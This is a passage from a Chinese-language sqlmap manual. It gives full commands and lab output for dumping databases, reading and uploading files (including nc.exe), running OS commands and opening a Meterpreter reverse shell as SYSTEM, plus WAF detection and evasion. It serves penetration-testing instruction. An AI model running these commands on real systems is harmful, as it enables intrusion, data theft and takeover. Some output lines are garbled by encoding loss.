使用-D,-T參數(shù)指適定想要獲取哪個庫的哪個表,不用-D參數(shù)時,默認使用當(dāng)前庫。

列舉一個Firebird的例子:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users [...] Database: Firebird_masterdb Table: USERS [4 entries] +----+--------+------------+ | ID | NAME?? | SURNAME????| +----+--------+------------+ | 1??| luther | blisset????| | 2??| fluffy | bunny??????| | 3??| wu???? | ming?????? | | 4??| NULL?? | nameisnull | +----+--------+------------+

可以獲取指定庫中的所有表的內(nèi)容,只用-dump跟-D參數(shù)(不使用-T與-C參數(shù))。

也可以用-dump跟-C獲取指定的字段內(nèi)容。

sqlmap為每個表生成了一個CSV文件。

如果你只想獲取一段數(shù)據(jù),可以使用--start和--stop參數(shù),例如,你只想獲取第一段數(shù)據(jù)可hi使用--stop 1,如果想獲取第二段與第三段數(shù)據(jù),使用參數(shù) --start 1 --stop 3。

也可以用--first與--last參數(shù),獲取第幾個字符到第幾個字符的內(nèi)容,如果你想獲取字段中地三個字符到第五個字符的內(nèi)容,使用--first 3 --last 5,只在盲注的時候使用,因為其他方式可以準確的獲取注入內(nèi)容,不需要一個字符一個字符的猜解。

獲取所有數(shù)據(jù)庫表的內(nèi)容

參數(shù):--dump-all,--exclude-sysdbs

使用--dump-all參數(shù)獲取所有數(shù)據(jù)庫表的內(nèi)容,可同時加上--exclude-sysdbs只獲取用戶數(shù)據(jù)庫的表,需要注意在Microsoft SQL Server中master數(shù)據(jù)庫沒有考慮成為一個系統(tǒng)數(shù)據(jù)庫,因為有的管理員會把他當(dāng)初用戶數(shù)據(jù)庫一樣來使用它。

搜索字段,表,數(shù)據(jù)庫

參數(shù):--search,-C,-T,-D

--search可以用來尋找特定的數(shù)據(jù)庫名,所有數(shù)據(jù)庫中的特定表名,所有數(shù)據(jù)庫表中的特定字段。

可以在一下三種情況下使用:

-C后跟著用逗號分割的列名,將會在所有數(shù)據(jù)庫表中搜索指定的列名。 -T后跟著用逗號分割的表名,將會在所有數(shù)據(jù)庫中搜索指定的表名 -D后跟著用逗號分割的庫名,將會在所有數(shù)據(jù)庫中搜索指定的庫名。

運行自定義的SQL語句

參數(shù):--sql-query,--sql-shell

sqlmap會自動檢測確定使用哪種SQL注入技術(shù),如何插入檢索語句。

如果是SELECT查詢語句,sqlap將會輸出結(jié)果。如果是通過SQL注入執(zhí)行其他語句,需要測試是否支持多語句執(zhí)行SQL語句。

列舉一個Mircrosoft SQL Server 2000的例子:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo'" -v 1[...] [hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo'' [hh:mm:14] [INFO] retrieved: foo SELECT 'foo':????'foo'$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo', 'bar'" -v 2[...] [hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar'' [hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind [hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)), (CHAR(32))) [hh:mm:50] [INFO] retrieved: foo [hh:mm:50] [DEBUG] performed 27 queries in 0 seconds [hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VARCHAR(8000)), (CHAR(32))) [hh:mm:50] [INFO] retrieved: bar [hh:mm:50] [DEBUG] performed 27 queries in 0 seconds SELECT 'foo', 'bar':????'foo, bar'

爆破


暴力破解表名

參數(shù):--common-tables

當(dāng)使用--tables無法獲取到數(shù)據(jù)庫的表時,可以使用此參數(shù)。

通常是如下情況:

1、MySQL數(shù)據(jù)庫版本小于5.0,沒有information_schema表。 2、數(shù)據(jù)庫是Microssoft Access,系統(tǒng)表MSysObjects是不可讀的(默認)。 3、當(dāng)前用戶沒有權(quán)限讀取系統(tǒng)中保存數(shù)據(jù)結(jié)構(gòu)的表的權(quán)限。

暴力破解的表在txt/common-tables.txt文件中,你可以自己添加。

列舉一個MySQL 4.1的例子:

$ python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --common-tables -D testdb --banner[...] [hh:mm:39] [INFO] testing MySQL [hh:mm:39] [INFO] confirming MySQL [hh:mm:40] [INFO] the back-end DBMS is MySQL [hh:mm:40] [INFO] fetching banner web server operating system: Windows web application technology: PHP 5.3.1, Apache 2.2.14 back-end DBMS operating system: Windows back-end DBMS: MySQL &lt; 5.0.0 banner:????'4.1.21-community-nt'[hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/txt/common-tables.txt' [hh:mm:40] [INFO] adding words used on web page to the check list please enter number of threads? [Enter for 1 (current)] 8 [hh:mm:43] [INFO] retrieved: usersDatabase: testdb [1 table] +-------+ | users | +-------+

暴力破解列名

參數(shù):--common-columns

與暴力破解表名一樣,暴力跑的列名在txt/common-columns.txt中。

用戶自定義函數(shù)注入


參數(shù):--udf-inject,--shared-lib

你可以通過編譯MySQL注入你自定義的函數(shù)(UDFs)或PostgreSQL在windows中共享庫,DLL,或者Linux/Unix中共享對象,sqlmap將會問你一些問題,上傳到服務(wù)器數(shù)據(jù)庫自定義函數(shù),然后根據(jù)你的選擇執(zhí)行他們,當(dāng)你注入完成后,sqlmap將會移除它們。

系統(tǒng)文件操作


從數(shù)據(jù)庫服務(wù)器中讀取文件

參數(shù):--file-read

當(dāng)數(shù)據(jù)庫為MySQL,PostgreSQL或Microsoft SQL Server,并且當(dāng)前用戶有權(quán)限使用特定的函數(shù)。讀取的文件可以是文本也可以是二進制文件。

列舉一個Microsoft SQL Server 2005的例子:

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \ --file-read "C:/example.exe" -v 1[...] [hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2000 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2005[hh:mm:50] [INFO] fetching file: 'C:/example.exe' [hh:mm:50] [INFO] the SQL query provided returns 3 entries C:/example.exe file saved to:????'/software/sqlmap/output/192.168.136.129/files/C__example.exe' [...]$ ls -l output/192.168.136.129/files/C__example.exe -rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe$ file output/192.168.136.129/files/C__example.exe output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

把文件上傳到數(shù)據(jù)庫服務(wù)器中

參數(shù):--file-write,--file-dest

當(dāng)數(shù)據(jù)庫為MySQL,PostgreSQL或Microsoft SQL Server,并且當(dāng)前用戶有權(quán)限使用特定的函數(shù)。上傳的文件可以是文本也可以是二進制文件。

列舉一個MySQL的例子:

$ file /software/nc.exe.packed /software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit$ ls -l /software/nc.exe.packed -rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \ "/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1[...] [hh:mm:29] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2003 or 2008 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: MySQL &gt;= 5.0.0[...] do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully written on the back-end DBMS file system? [Y/n] y [hh:mm:52] [INFO] retrieved: 31744 [hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes, same size as the local file '/software/nc.exe.packed'

運行任意操作系統(tǒng)命令

參數(shù):--os-cmd,--os-shell

當(dāng)數(shù)據(jù)庫為MySQL,PostgreSQL或Microsoft SQL Server,并且當(dāng)前用戶有權(quán)限使用特定的函數(shù)。

在MySQL、PostgreSQL,sqlmap上傳一個二進制庫,包含用戶自定義的函數(shù),sys_exec()和sys_eval()。

那么他創(chuàng)建的這兩個函數(shù)可以執(zhí)行系統(tǒng)命令。在Microsoft SQL Server,sqlmap將會使用xp_cmdshell存儲過程,如果被禁(在Microsoft SQL Server 2005及以上版本默認禁制),sqlmap會重新啟用它,如果不存在,會自動創(chuàng)建。

列舉一個PostgreSQL的例子:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" \ --os-cmd id -v 1[...] web application technology: PHP 5.2.6, Apache 2.2.9 back-end DBMS: PostgreSQL [hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system [hh:mm:12] [INFO] the back-end DBMS operating system is Linux [hh:mm:12] [INFO] testing if current user is DBA [hh:mm:12] [INFO] detecting back-end DBMS version from its banner [hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist [hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist [hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file [hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file do you want to retrieve the command standard output? [Y/n/a] y command standard output:????'uid=104(postgres) gid=106(postgres) groups=106(postgres)'[hh:mm:19] [INFO] cleaning up the database management system do you want to remove UDF 'sys_eval'? [Y/n] y do you want to remove UDF 'sys_exec'? [Y/n] y [hh:mm:23] [INFO] database management system cleanup finished [hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can only be deleted manually

用--os-shell參數(shù)也可以模擬一個真實的shell,可以輸入你想執(zhí)行的命令。

當(dāng)不能執(zhí)行多語句的時候(比如php或者asp的后端數(shù)據(jù)庫為MySQL時),仍然可能使用INTO OUTFILE寫進可寫目錄,來創(chuàng)建一個web后門。支持的語言:

1、ASP 2、ASP.NET 3、JSP 4、PHP

Meterpreter配合使用

參數(shù):--os-pwn,--os-smbrelay,--os-bof,--priv-esc,--msf-path,--tmp-path

當(dāng)數(shù)據(jù)庫為MySQL,PostgreSQL或Microsoft SQL Server,并且當(dāng)前用戶有權(quán)限使用特定的函數(shù),可以在數(shù)據(jù)庫與攻擊者直接建立TCP連接,這個連接可以是一個交互式命令行的Meterpreter會話,sqlmap根據(jù)Metasploit生成shellcode,并有四種方式執(zhí)行它:

1、通過用戶自定義的sys_bineval()函數(shù)在內(nèi)存中執(zhí)行Metasplit的shellcode,支持MySQL和PostgreSQL數(shù)據(jù)庫,參數(shù):--os-pwn。 2、通過用戶自定義的函數(shù)上傳一個獨立的payload執(zhí)行,MySQL和PostgreSQL的sys_exec()函數(shù),Microsoft SQL Server的xp_cmdshell()函數(shù),參數(shù):--os-pwn。 3、通過SMB攻擊(MS08-068)來執(zhí)行Metasploit的shellcode,當(dāng)sqlmap獲取到的權(quán)限足夠高的時候(Linux/Unix的uid=0,Windows是Administrator),--os-smbrelay。 4、通過溢出Microsoft SQL Server 2000和2005的sp_replwritetovarbin存儲過程(MS09-004),在內(nèi)存中執(zhí)行Metasploit的payload,參數(shù):--os-bof

列舉一個MySQL例子:

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit[...] [hh:mm:31] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2003 web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0 back-end DBMS: MySQL 5.0 [hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system [hh:mm:31] [INFO] the back-end DBMS operating system is Windows how do you want to establish the tunnel? [1] TCP: Metasploit Framework (default) [2] ICMP: icmpsh - ICMP tunneling &gt; [hh:mm:32] [INFO] testing if current user is DBA [hh:mm:32] [INFO] fetching current user what is the back-end database management system architecture? [1] 32-bit (default) [2] 64-bit &gt; [hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist [hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist [hh:mm:33] [INFO] detecting back-end DBMS version from its banner [hh:mm:33] [INFO] retrieving MySQL base directory absolute path [hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file [hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file how do you want to execute the Metasploit shellcode on the back-end database underlying operating system? [1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default) [2] Stand-alone payload stager (file system way) &gt; [hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode which connection type do you want to use? [1] Reverse TCP: Connect back from the database host to this machine (default) [2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535 [3] Bind TCP: Listen on the database host for a connection &gt; which is the local address? [192.168.136.1] which local port number do you want to use? [60641] which payload do you want to use? [1] Meterpreter (default) [2] Shell [3] VNC &gt; [hh:mm:40] [INFO] creation in progress ... done [hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait.._| |??????o _??_??_????_ _|_??__,?? ,????_??| |??__????_|_ / |/ |/ |??|/??|??/??|??/ \_|/ \_|/??/??\_|??| |??|??|_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_//|\|=[ metasploit v3.7.0-dev [core:3.7 api:1.0] + -- --=[ 674 exploits - 351 auxiliary + -- --=[ 217 payloads - 27 encoders - 8 nops=[ svn r12272 updated 4 days ago (2011.04.07)PAYLOAD =&gt; windows/meterpreter/reverse_tcp EXITFUNC =&gt; thread LPORT =&gt; 60641 LHOST =&gt; 192.168.136.1 [*] Started reverse handler on 192.168.136.1:60641 [*] Starting the payload handler... [hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait.. [*] Sending stage (749056 bytes) to 192.168.136.129 [*] Meterpreter session 1 opened (192.168.136.1:60641 -&gt; 192.168.136.129:1689) at Mon Apr 11 hh:mm:52 +0100 2011meterpreter &gt; Loading extension espia...success. meterpreter &gt; Loading extension incognito...success. meterpreter &gt; [-] The 'priv' extension has already been loaded. meterpreter &gt; Loading extension sniffer...success. meterpreter &gt; System Language : en_US OS??????????????: Windows .NET Server (Build 3790, Service Pack 2). Computer????????: W2K3R2 Architecture????: x86 Meterpreter???? : x86/win32 meterpreter &gt; Server username: NT AUTHORITY\SYSTEM meterpreter &gt; ipconfigMS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address??: 127.0.0.1 Netmask???? : 255.0.0.0Intel(R) PRO/1000 MT Network Connection Hardware MAC: 00:0c:29:fc:79:39 IP Address??: 192.168.136.129 Netmask???? : 255.255.255.0meterpreter &gt; exit[*] Meterpreter session 1 closed.??Reason: User exit

默認情況下MySQL在Windows上以SYSTEM權(quán)限運行,PostgreSQL在Windows與Linux中是低權(quán)限運行,Microsoft SQL Server 2000默認是以SYSTEM權(quán)限運行,Microsoft SQL Server 2005與2008大部分是以NETWORK SERVICE有時是LOCAL SERVICE。

?

對Windows注冊表操作


當(dāng)數(shù)據(jù)庫為MySQL,PostgreSQL或Microsoft SQL Server,并且當(dāng)前web應(yīng)用支持堆查詢。 當(dāng)然,當(dāng)前連接數(shù)據(jù)庫的用戶也需要有權(quán)限操作注冊表。

?

讀取注冊表值

參數(shù):--reg-read

寫入注冊表值

參數(shù):--reg-add

刪除注冊表值

參數(shù):--reg-del

注冊表輔助選項

參數(shù):--reg-key,--reg-value,--reg-data,--reg-type

需要配合之前三個參數(shù)使用,例子:

$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1

常規(guī)參數(shù)


從sqlite中讀取session

參數(shù):-s

sqlmap對每一個目標都會在output路徑下自動生成一個SQLite文件,如果用戶想指定讀取的文件路徑,就可以用這個參數(shù)。

保存HTTP(S)日志

參數(shù):-t

這個參數(shù)需要跟一個文本文件,sqlmap會把HTTP(S)請求與響應(yīng)的日志保存到那里。

非交互模式

參數(shù):--batch

用此參數(shù),不需要用戶輸入,將會使用sqlmap提示的默認值一直運行下去。

強制使用字符編碼

參數(shù):--charset

不使用sqlmap自動識別的(如HTTP頭中的Content-Type)字符編碼,強制指定字符編碼如:

--charset=GBK

爬行網(wǎng)站URL

參數(shù):--crawl

sqlmap可以收集潛在的可能存在漏洞的連接,后面跟的參數(shù)是爬行的深度。

例子:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3 [...] [xx:xx:53] [INFO] starting crawler [xx:xx:53] [INFO] searching for links with depth 1 [xx:xx:53] [WARNING] running in a single-thread mode. This could take a while [xx:xx:53] [INFO] searching for links with depth 2 [xx:xx:54] [INFO] heuristics detected web page charset 'ascii' [xx:xx:00] [INFO] 42/56 links visited (75%) [...]

規(guī)定輸出到CSV中的分隔符

參數(shù):--csv-del

當(dāng)dump保存為CSV格式時(--dump-format=CSV),需要一個分隔符默認是逗號,用戶也可以改為別的 如:

--csv-del=";"

DBMS身份驗證

參數(shù):--dbms-cred

某些時候當(dāng)前用戶的權(quán)限不夠,做某些操作會失敗,如果知道高權(quán)限用戶的密碼,可以使用此參數(shù),有的數(shù)據(jù)庫有專門的運行機制,可以切換用戶如Microsoft SQL Server的OPENROWSET函數(shù)

定義dump數(shù)據(jù)的格式

參數(shù):--dump-format

輸出的格式可定義為:CSV,HTML,SQLITE

預(yù)估完成時間

參數(shù):--eta

可以計算注入數(shù)據(jù)的剩余時間。

例如Oracle的布爾型盲注:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta [...] [hh:mm:01] [INFO] the back-end DBMS is Oracle [hh:mm:01] [INFO] fetching banner [hh:mm:01] [INFO] retrieving the length of query output [hh:mm:01] [INFO] retrieved: 64 17% [========>??????????????????????????????????????????] 11/64??ETA 00:19

然后:

100% [===================================================] 64/64 [hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod web application technology: PHP 5.2.6, Apache 2.2.9 back-end DBMS: Oracle banner:????'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'

sqlmap先輸出長度,預(yù)計完成時間,顯示百分比,輸出字符

刷新session文件

參數(shù):--flush-session

如果不想用之前緩存這個目標的session文件,可以使用這個參數(shù)。 會清空之前的session,重新測試該目標。

自動獲取form表單測試

參數(shù):--forms

如果你想對一個頁面的form表單中的參數(shù)測試,可以使用-r參數(shù)讀取請求文件,或者通過--data參數(shù)測試。 但是當(dāng)使用--forms參數(shù)時,sqlmap會自動從-u中的url獲取頁面中的表單進行測試。

忽略在會話文件中存儲的查詢結(jié)果

參數(shù):--fresh-queries

忽略session文件保存的查詢,重新查詢。

使用DBMS的hex函數(shù)

參數(shù):--hex

有時候字符編碼的問題,可能導(dǎo)致數(shù)據(jù)丟失,可以使用hex函數(shù)來避免:

針對PostgreSQL例子:

$ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors [...] [xx:xx:14] [INFO] fetching banner [xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC) [xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'>function.pg-query</a>]: Query failed: ERROR:??invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.php</b> on line <b>35</b>' [xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2 [...]

自定義輸出的路徑

參數(shù):--output-dir

sqlmap默認把session文件跟結(jié)果文件保存在output文件夾下,用此參數(shù)可自定義輸出路徑 例如:--output-dir=/tmp

從響應(yīng)中獲取DBMS的錯誤信息

參數(shù):--parse-errors

有時目標沒有關(guān)閉DBMS的報錯,當(dāng)數(shù)據(jù)庫語句錯誤時,會輸出錯誤語句,用此參數(shù)可以顯示出錯誤信息。

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors [...] [11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list. <b>/sqlmap/mssql/iis/get_int.asp, line 27</b>' [11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list. <b>/sqlmap/mssql/iis/get_int.asp, line 27</b>' [11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list. <b>/sqlmap/mssql/iis/get_int.asp, line 27</b>' [11:12:17] [INFO] target URL appears to have 3 columns in query [...]

其他的一些參數(shù)


使用參數(shù)縮寫

參數(shù):-z

有使用參數(shù)太長太復(fù)雜,可以使用縮寫模式。 例如:

python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"

可以寫成:

python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"

還有:

python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"

可以寫成:

python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"

成功SQL注入時警告?

參數(shù):--alert

設(shè)定會發(fā)的答案

參數(shù):--answers

當(dāng)希望sqlmap提出輸入時,自動輸入自己想要的答案可以使用此參數(shù): 例子:

$ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--technique=E --answers="extending=N" --batch [...] [xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id' heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y [xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N [...]

發(fā)現(xiàn)SQL注入時發(fā)出蜂鳴聲

參數(shù):--beep

發(fā)現(xiàn)sql注入時,發(fā)出蜂鳴聲。

啟發(fā)式檢測WAF/IPS/IDS保護

參數(shù):--check-waf

WAF/IPS/IDS保護可能會對sqlmap造成很大的困擾,如果懷疑目標有此防護的話,可以使用此參數(shù)來測試。 sqlmap將會使用一個不存在的參數(shù)來注入測試

例如:

&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1

如果有保護的話可能返回結(jié)果會不同。

清理sqlmap的UDF(s)和表

參數(shù):--cleanup

清除sqlmap注入時產(chǎn)生的udf與表。

禁用彩色輸出

參數(shù):--desable-coloring

sqlmap默認彩色輸出,可以使用此參數(shù),禁掉彩色輸出。

使用指定的Google結(jié)果頁面

參數(shù):--gpage

默認sqlmap使用前100個URL地址作為注入測試,結(jié)合此選項,可以指定頁面的URL測試。

使用HTTP參數(shù)污染(Http parament pollution)

參數(shù):-hpp

HTTP參數(shù)污染可能會繞過WAF/IPS/IDS保護機制,這個對ASP/IIS與ASP.NET/IIS平臺很有效。

測試WAF/IPS/IDS保護

參數(shù):--identify-waf

sqlmap 可以嘗試找出 WAF/IPS/IDS 保護,方便用戶做出繞過方式。目前大約支持30種產(chǎn)品的識別。

例如對一個受到ModSecurity WAF保護的MySQL例子:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3 [...] [xx:xx:23] [INFO] testing connection to the target URL [xx:xx:23] [INFO] heuristics detected web page charset 'ascii' [xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)' [xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1' [xx:xx:23] [DEBUG] page not found (404) [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)' [xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper') [...]

模仿智能手機

參數(shù):--mobile

有時服務(wù)端只接收移動端的訪問,此時可以設(shè)定一個手機的User-Agent來模仿手機登陸。

例如:

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile [...] which smartphone do you want sqlmap to imitate through HTTP User-Agent header? [1] Apple iPhone 4s (default) [2] BlackBerry 9900 [3] Google Nexus 7 [4] HP iPAQ 6365 [5] HTC Sensation [6] Nokia N97 [7] Samsung Galaxy S > 1 [...]

安全的刪除output目錄的文件

參數(shù):--purge-output

有時需要刪除結(jié)果文件,而不被恢復(fù),可以使用此參數(shù),原有文件將會被隨機的一些文件覆蓋。

例如:

$ python sqlmap.py --purge-output -v 3 [...] [xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'... [xx:xx:55] [DEBUG] changing file attributes [xx:xx:55] [DEBUG] writing random data to files [xx:xx:55] [DEBUG] truncating files [xx:xx:55] [DEBUG] renaming filenames to random values [xx:xx:55] [DEBUG] renaming directory names to random values [xx:xx:55] [DEBUG] deleting the whole directory tree [...]

啟發(fā)式判斷注入

參數(shù):--smart

有時對目標非常多的URL進行測試,為節(jié)省時間,只對能夠快速判斷為注入的報錯點進行注入,可以使用此參數(shù)。

例子:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart [...] [xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic [xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable [xx:xx:14] [INFO] skipping GET parameter 'ca' [xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic [xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable [xx:xx:14] [INFO] skipping GET parameter 'user' [xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic [xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic [xx:xx:14] [INFO] GET parameter 'id' is dynamic [xx:xx:14] [WARNING] reflective value(s) found and filtering out [xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') [xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id' heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y [xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable [xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable [xx:xx:14] [INFO] testing 'MySQL inline queries' [xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries' 